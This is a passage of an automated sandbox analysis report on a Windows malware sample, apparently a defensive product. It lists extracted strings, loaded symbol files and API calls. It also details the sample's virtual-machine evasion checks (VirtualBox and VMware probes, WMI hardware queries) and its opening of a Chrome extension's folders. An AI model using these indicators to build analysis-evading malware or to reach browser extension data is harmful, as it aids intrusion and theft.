                      Source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .xlsmMicrosoft.Office.Desktop_8wekyb3d8bbwe!Excel.dot.dotx.docmMicrosoft.Office.Desktop_8wekyb3d8bbwe!WordMicrosoft.Office.Desktop_8wekyb3d8bbwe!PowerPoint.ods.xla.xlam.xlt.xltm.xltx.xlsb.pps.ppsm.ppsx.thmx.pot.potm.potx.pptmms-powerpointms-excelms-word.odp.ppa.ppamABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/Explorer.AssocActionId.CloseSessionExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionAppExplorer.AssocActionId.BurnSelectionStickyNotestelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMSFileIehistoryIerssJavascriptJscriptLDAPResrlogin.cpf.crd.crds.crt.csh.fxp.gadget.grp.ade.adp.app.application.appref-ms.asp.bas.cnt.ksh.mad.maf.mag.mam.maq.mar.mas.hlp.hme.hpj.hta.ins.isp.its.jse.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mat.mau.mav.maw.mcf.mda.mde.mdt.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.mshxml.mst.ops.pcd.pl.plg.prf.prg.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.xnk.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xipKOTWCNFRBRITNLSVENDEJAPTTRSKSLARHEEUISDAFIHUNOELPLRUCSiu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAbs-BA-Latnzh-Hantzh-CHTsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrlzh-Hanszh-CHSarbgcacsdadeitjakonlplptrmroelenesfifrhehuisukbesletlvlttgfaruhrsksqsvthtrurtnvexhzuafkafohivihyazeuhsbmksttstkuzttbnpaguortamtsegayimskkkyswcykmlomyglkokmnisdteknmlasmrsamnbofypsfildvbinffhaibbsyrsichriuamtzmksneomtignhawlasoiipapyoquznsobalbkligkrsahqucrwwoprsgdkuar-SAarnmohbrugmioccogswes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITja-JPbg-BGca-ESzh-TWcs-CZda
-DKde-DEel-GRen-UShr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKid-IDko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROru-RUvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAts-ZAuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJfa-IRmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEtk-TMtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOhi-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNcy-GBuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INte-INsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPfy-NLkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INsyr-SYquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGom-ETps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGyo-NGmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRsah-RUti-ETgn-PYhaw-USla-001so-SOii-CNpap-029arn-CLar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEit-CHquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocqps-plocadsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDpa-Arab-PKnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INaz-Cyrl-AZti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUes-ESta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNquz-ECen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZzh-MOfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGde-LUfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-OMde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEes-PAsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSar-JOen-JMes-VEfr-REsms-FIar-YEen-029es-COfr-CDsr-Cyrl-MEar-KWen-PHes-CLf
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
                      Source: rundll32.exe | String found in binary or memory: ./?.so;lua/lib/amd64/?.so;lua/lib/amd64/loadall.so
                      Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook
                      Source: Binary string: wkernel32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.309860796.000000000232F000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.309988464.0000000002450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: WINMMBASE.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333673223.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.316124357.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315893635.000000000232D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcrt.pdb source: MqE1p1WFrf.exe, 00000001.00000003.325515967.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.325224942.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdb source: MqE1p1WFrf.exe, 00000001.00000003.319728017.000000000232D000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.320216371.00000000023F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: MqE1p1WFrf.exe, 00000001.00000003.309501419.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308672485.0000000002322000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308435345.0000000002321000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdb source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.326882570.0000000002270000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.363854408.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.314431146.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320524869.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.339607068.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.335892894.0000000002649000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314477899.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.331563420.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320396311.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: winmm.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333316141.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.326182710.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.319728017.000000000232D000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.320216371.00000000023F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdb source: MqE1p1WFrf.exe, 00000001.00000003.315606867.0000000002182000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315705538.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.314477899.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333746453.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdb source: MqE1p1WFrf.exe, 00000001.00000003.341772259.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.320396311.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314431146.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.339607068.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.335892894.0000000002649000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdb source: rundll32.exe, 00000004.00000003.358705595.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: combase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.317707376.00000000028A0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316782050.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.316124357.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315893635.000000000232D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333746453.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: WINMMBASE.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333673223.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.314533170.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315108088.00000000026BC000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: profapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332804586.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.378529171.0000017ED6FE0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000004.00000003.358705595.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ws2_32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.334391183.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314533170.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315108088.00000000026BC000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.326882570.0000000002270000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.363854408.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.341772259.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320596267.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.309501419.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308672485.0000000002322000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308435345.0000000002321000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.316556327.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316355611.0000000002325000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winmm.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333316141.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332966854.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332966854.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wmswsock.pdb source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.341846355.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312105202.0000000002270000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.316556327.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316355611.0000000002325000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.309860796.000000000232F000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.309988464.0000000002450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320596267.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.315606867.0000000002182000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315705538.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.331563420.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.334011206.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.333783737.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.326182710.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320524869.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: combase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.317707376.00000000028A0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316782050.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdb source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: profapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332804586.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.378529171.0000017ED6FE0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wmswsock.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.341846355.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.334011206.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.333783737.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdb source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312105202.0000000002270000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ws2_32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.334391183.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Code function: 1_2_00406060 push eax; ret 1_2_0040608E
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007FFA06EE9040 push rax; retf 4_2_00007FFA06EE9041
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Code function: 1_2_004081BD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004081BD
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File created: C:\Users\user\AppData\Roaming\nsis_uns60877c.dll
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match | File source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.357859065.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | System information queried: FirmwareTableInformation
                      Source: rundll32.exe | Binary or memory string: ASWHOOK.DLL
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_1-4068
                      Source: C:\Windows\System32\rundll32.exe | Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Memory allocated: 2640000 memory commit | memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File opened / queried: VBoxGuest
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File opened / queried: C:\Windows\SysWOW64\vboxservice.exe
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File opened / queried: C:\Windows\SysWOW64\vboxtray.exe
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File opened / queried: VBoxTrayIPC
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sys
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File opened / queried: C:\Windows\SysWOW64\vboxhook.dll
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File opened / queried: \pipe\VBoxTrayIPC
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sys
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File opened / queried: VBoxMiniRdrDN
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sys
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Code function: 1_2_00403317 GetSystemInfo,VirtualQuery,KiUserExceptionDispatcher,VirtualQuery,1_2_00403317
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DA828C _calloc_dbg,FindFirstFileW,FindNextFileW,4_2_00007DF471DA828C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DA782C FindFirstFileW,FindNextFileW,FindClose,4_2_00007DF471DA782C
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | API call chain: ExitProcess graph end node graph_1-4346
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                      Source: rundll32.exe, 00000004.00000003.408357863.0000017ED6ED7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW b
                      Source: MqE1p1WFrf.exe, 00000001.00000003.349875511.0000000000477000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware ToolsE-2E35-11D2-B604-00104B703EFD}\REGISTRY\MACHINE\SOFTWARE\Clas\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Toolsc
